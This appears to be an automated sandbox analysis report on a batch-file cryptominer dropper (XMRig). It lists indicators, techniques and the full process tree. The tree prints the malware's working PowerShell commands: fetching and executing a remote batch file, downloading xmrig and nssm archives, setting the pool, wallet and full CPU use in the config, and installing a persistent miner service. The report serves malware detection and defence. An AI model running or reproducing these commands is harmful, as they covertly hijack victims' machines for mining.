xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
72s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 02:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

266711629218179.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 16 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\moneroocean\xmrig.exe	family_xmrig
C:\Users\Admin\moneroocean\xmrig.exe	xmrig
behavioral2/memory/4504-66-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-190-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-191-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-192-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-193-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-194-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-195-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-196-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-197-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-198-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-199-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-200-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3900-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

6 1804 powershell.exe
16 3328 powershell.exe
31 4900 powershell.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 9 IoCs

Processes:

xmrig.exenssm.exenssm.exenssm.exenssm.exenssm.exenssm.exenssm.exexmrig.exe

pid process

4504 xmrig.exe
2704 nssm.exe
3760 nssm.exe
3200 nssm.exe
2816 nssm.exe
3116 nssm.exe
772 nssm.exe
1128 nssm.exe
3900 xmrig.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

31 raw.githubusercontent.com
15 raw.githubusercontent.com
16 raw.githubusercontent.com
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

2816 sc.exe
2704 sc.exe
4016 sc.exe
3196 sc.exe

flow	pid	process
6	1804	powershell.exe
16	3328	powershell.exe
31	4900	powershell.exe

pid	process
4504	xmrig.exe
2704	nssm.exe
3760	nssm.exe
3200	nssm.exe
2816	nssm.exe
3116	nssm.exe
772	nssm.exe
1128	nssm.exe
3900	xmrig.exe

flow	ioc
31	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com

pid	process
2816	sc.exe
2704	sc.exe
4016	sc.exe
3196	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2664	powershell.exe
3600	powershell.exe
2940	powershell.exe
1804	powershell.exe
1776	powershell.exe
4884	powershell.exe
4900	powershell.exe
3328	powershell.exe
3096	powershell.exe
3716	powershell.exe
3768	powershell.exe
4224	powershell.exe
112	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
3524	timeout.exe
4992	timeout.exe
640	timeout.exe
3960	timeout.exe
3316	timeout.exe
2316	timeout.exe
4040	timeout.exe
2796	timeout.exe
512	timeout.exe
4424	timeout.exe
2052	timeout.exe
2888	timeout.exe
3776	timeout.exe
1776	timeout.exe
4580	timeout.exe
2616	timeout.exe
3716	timeout.exe
4504	timeout.exe
1804	timeout.exe
4132	timeout.exe
4456	timeout.exe
3760	timeout.exe
1620	timeout.exe
2860	timeout.exe
2136	timeout.exe
3340	timeout.exe
4560	timeout.exe
3176	timeout.exe
5068	timeout.exe
2972	timeout.exe
1884	timeout.exe
4128	timeout.exe
3548	timeout.exe
3456	timeout.exe
2940	timeout.exe
5076	timeout.exe
4212	timeout.exe
1776	timeout.exe
3616	timeout.exe
2964	timeout.exe
1856	timeout.exe
1000	timeout.exe
4228	timeout.exe
368	timeout.exe
400	timeout.exe
3404	timeout.exe
3876	timeout.exe
3584	timeout.exe
1856	timeout.exe
4884	timeout.exe
2124	timeout.exe
2704	timeout.exe
3220	timeout.exe
1336	timeout.exe
1592	timeout.exe
3440	timeout.exe
772	timeout.exe
4612	timeout.exe
2304	timeout.exe
2604	timeout.exe
1092	timeout.exe
1132	timeout.exe
2128	timeout.exe
1456	timeout.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3336 taskkill.exe
Runs net.exe

pid	process
3336	taskkill.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1804	powershell.exe
1804	powershell.exe
3328	powershell.exe
3328	powershell.exe
1776	powershell.exe
1776	powershell.exe
2664	powershell.exe
2664	powershell.exe
3716	powershell.exe
3716	powershell.exe
3716	powershell.exe
3600	powershell.exe
3600	powershell.exe
3600	powershell.exe
3768	powershell.exe
3768	powershell.exe
3768	powershell.exe
4884	powershell.exe
4884	powershell.exe
4884	powershell.exe
4224	powershell.exe
4224	powershell.exe
4224	powershell.exe
2940	powershell.exe
2940	powershell.exe
2940	powershell.exe
4900	powershell.exe
4900	powershell.exe
4900	powershell.exe
112	powershell.exe
112	powershell.exe
112	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexmrig.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	3336	taskkill.exe
Token: SeDebugPrivilege	3328	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeDebugPrivilege	112	powershell.exe
Token: SeLockMemoryPrivilege	3900	xmrig.exe
Token: SeIncreaseQuotaPrivilege	212	WMIC.exe
Token: SeSecurityPrivilege	212	WMIC.exe
Token: SeTakeOwnershipPrivilege	212	WMIC.exe
Token: SeLoadDriverPrivilege	212	WMIC.exe
Token: SeSystemProfilePrivilege	212	WMIC.exe
Token: SeSystemtimePrivilege	212	WMIC.exe
Token: SeProfSingleProcessPrivilege	212	WMIC.exe
Token: SeIncBasePriorityPrivilege	212	WMIC.exe
Token: SeCreatePagefilePrivilege	212	WMIC.exe
Token: SeBackupPrivilege	212	WMIC.exe
Token: SeRestorePrivilege	212	WMIC.exe
Token: SeShutdownPrivilege	212	WMIC.exe
Token: SeDebugPrivilege	212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	212	WMIC.exe
Token: SeRemoteShutdownPrivilege	212	WMIC.exe
Token: SeUndockPrivilege	212	WMIC.exe
Token: SeManageVolumePrivilege	212	WMIC.exe
Token: 33	212	WMIC.exe
Token: 34	212	WMIC.exe
Token: 35	212	WMIC.exe
Token: 36	212	WMIC.exe
Token: SeIncreaseQuotaPrivilege	212	WMIC.exe
Token: SeSecurityPrivilege	212	WMIC.exe
Token: SeTakeOwnershipPrivilege	212	WMIC.exe
Token: SeLoadDriverPrivilege	212	WMIC.exe
Token: SeSystemProfilePrivilege	212	WMIC.exe
Token: SeSystemtimePrivilege	212	WMIC.exe
Token: SeProfSingleProcessPrivilege	212	WMIC.exe
Token: SeIncBasePriorityPrivilege	212	WMIC.exe
Token: SeCreatePagefilePrivilege	212	WMIC.exe
Token: SeBackupPrivilege	212	WMIC.exe
Token: SeRestorePrivilege	212	WMIC.exe
Token: SeShutdownPrivilege	212	WMIC.exe
Token: SeDebugPrivilege	212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	212	WMIC.exe
Token: SeRemoteShutdownPrivilege	212	WMIC.exe
Token: SeUndockPrivilege	212	WMIC.exe
Token: SeManageVolumePrivilege	212	WMIC.exe
Token: 33	212	WMIC.exe
Token: 34	212	WMIC.exe
Token: 35	212	WMIC.exe
Token: 36	212	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4704	WMIC.exe
Token: SeSecurityPrivilege	4704	WMIC.exe
Token: SeTakeOwnershipPrivilege	4704	WMIC.exe
Token: SeLoadDriverPrivilege	4704	WMIC.exe
Token: SeSystemProfilePrivilege	4704	WMIC.exe
Token: SeSystemtimePrivilege	4704	WMIC.exe
Token: SeProfSingleProcessPrivilege	4704	WMIC.exe
Token: SeIncBasePriorityPrivilege	4704	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

xmrig.exe

pid process

3900 xmrig.exe

pid	process
3900	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.execmd.exenet.execmd.exe

description	pid	process	target process
PID 4012 wrote to memory of 1804	4012	cmd.exe	powershell.exe
PID 4012 wrote to memory of 1804	4012	cmd.exe	powershell.exe
PID 1804 wrote to memory of 3796	1804	powershell.exe	cmd.exe
PID 1804 wrote to memory of 3796	1804	powershell.exe	cmd.exe
PID 3796 wrote to memory of 4112	3796	cmd.exe	net.exe
PID 3796 wrote to memory of 4112	3796	cmd.exe	net.exe
PID 4112 wrote to memory of 3616	4112	net.exe	net1.exe
PID 4112 wrote to memory of 3616	4112	net.exe	net1.exe
PID 3796 wrote to memory of 4240	3796	cmd.exe	where.exe
PID 3796 wrote to memory of 4240	3796	cmd.exe	where.exe
PID 3796 wrote to memory of 2332	3796	cmd.exe	where.exe
PID 3796 wrote to memory of 2332	3796	cmd.exe	where.exe
PID 3796 wrote to memory of 3776	3796	cmd.exe	where.exe
PID 3796 wrote to memory of 3776	3796	cmd.exe	where.exe
PID 3796 wrote to memory of 700	3796	cmd.exe	where.exe
PID 3796 wrote to memory of 700	3796	cmd.exe	where.exe
PID 3796 wrote to memory of 772	3796	cmd.exe	nssm.exe
PID 3796 wrote to memory of 772	3796	cmd.exe	nssm.exe
PID 3796 wrote to memory of 2816	3796	cmd.exe	nssm.exe
PID 3796 wrote to memory of 2816	3796	cmd.exe	nssm.exe
PID 3796 wrote to memory of 2704	3796	cmd.exe	nssm.exe
PID 3796 wrote to memory of 2704	3796	cmd.exe	nssm.exe
PID 3796 wrote to memory of 3336	3796	cmd.exe	taskkill.exe
PID 3796 wrote to memory of 3336	3796	cmd.exe	taskkill.exe
PID 3796 wrote to memory of 3328	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 3328	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 1776	3796	cmd.exe	WMIC.exe
PID 3796 wrote to memory of 1776	3796	cmd.exe	WMIC.exe
PID 3796 wrote to memory of 2664	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 2664	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 4504	3796	cmd.exe	xmrig.exe
PID 3796 wrote to memory of 4504	3796	cmd.exe	xmrig.exe
PID 3796 wrote to memory of 2972	3796	cmd.exe	cmd.exe
PID 3796 wrote to memory of 2972	3796	cmd.exe	cmd.exe
PID 2972 wrote to memory of 3096	2972	cmd.exe	powershell.exe
PID 2972 wrote to memory of 3096	2972	cmd.exe	powershell.exe
PID 3796 wrote to memory of 3716	3796	cmd.exe	timeout.exe
PID 3796 wrote to memory of 3716	3796	cmd.exe	timeout.exe
PID 3796 wrote to memory of 3600	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 3600	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 3768	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 3768	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 4884	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 4884	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 4224	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 4224	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 2940	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 2940	3796	cmd.exe	powershell.exe
PID 3796 wrote to memory of 4900	3796	cmd.exe	WMIC.exe
PID 3796 wrote to memory of 4900	3796	cmd.exe	WMIC.exe
PID 3796 wrote to memory of 112	3796	cmd.exe	WMIC.exe
PID 3796 wrote to memory of 112	3796	cmd.exe	WMIC.exe
PID 3796 wrote to memory of 4016	3796	cmd.exe	sc.exe
PID 3796 wrote to memory of 4016	3796	cmd.exe	sc.exe
PID 3796 wrote to memory of 3196	3796	cmd.exe	sc.exe
PID 3796 wrote to memory of 3196	3796	cmd.exe	sc.exe
PID 3796 wrote to memory of 2704	3796	cmd.exe	timeout.exe
PID 3796 wrote to memory of 2704	3796	cmd.exe	timeout.exe
PID 3796 wrote to memory of 3760	3796	cmd.exe	timeout.exe
PID 3796 wrote to memory of 3760	3796	cmd.exe	timeout.exe
PID 3796 wrote to memory of 3200	3796	cmd.exe	nssm.exe
PID 3796 wrote to memory of 3200	3796	cmd.exe	nssm.exe
PID 3796 wrote to memory of 2816	3796	cmd.exe	nssm.exe
PID 3796 wrote to memory of 2816	3796	cmd.exe	nssm.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\266711629218179.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp73F7.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
3⤵
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\system32\net.exe
net session
4⤵
- Suspicious use of WriteProcessMemory
PID:4112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
5⤵
PID:3616

C:\Windows\system32\where.exe
where powershell
4⤵
PID:4240

C:\Windows\system32\where.exe
where find
4⤵
PID:2332

C:\Windows\system32\where.exe
where findstr
4⤵
PID:3776

C:\Windows\system32\where.exe
where tasklist
4⤵
PID:700

C:\Windows\system32\where.exe
where sc
4⤵
PID:772

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:2816

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:2704

C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe" --help
4⤵
- Executes dropped EXE
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
4⤵
- Suspicious use of WriteProcessMemory
PID:2972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
5⤵
- Command and Scripting Interpreter: PowerShell
PID:3096

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
6⤵
PID:2400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ejefcdnk\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:112

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:4016

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:3196

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
4⤵
- Executes dropped EXE
PID:2704

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
4⤵
- Executes dropped EXE
PID:3760

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
4⤵
- Executes dropped EXE
PID:3200

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
4⤵
- Executes dropped EXE
PID:2816

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
4⤵
- Executes dropped EXE
PID:3116

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
4⤵
- Executes dropped EXE
PID:772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3876

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:212

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:860

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4252

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1776

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2340

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4524

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2036

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:644

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3236

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3616

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2292

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3608

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4580

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:832

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4136

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3748

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:632

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1900

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1420

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3952

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5116

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4436

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4292

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1120

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4996

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3984

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3444

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1868

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1776

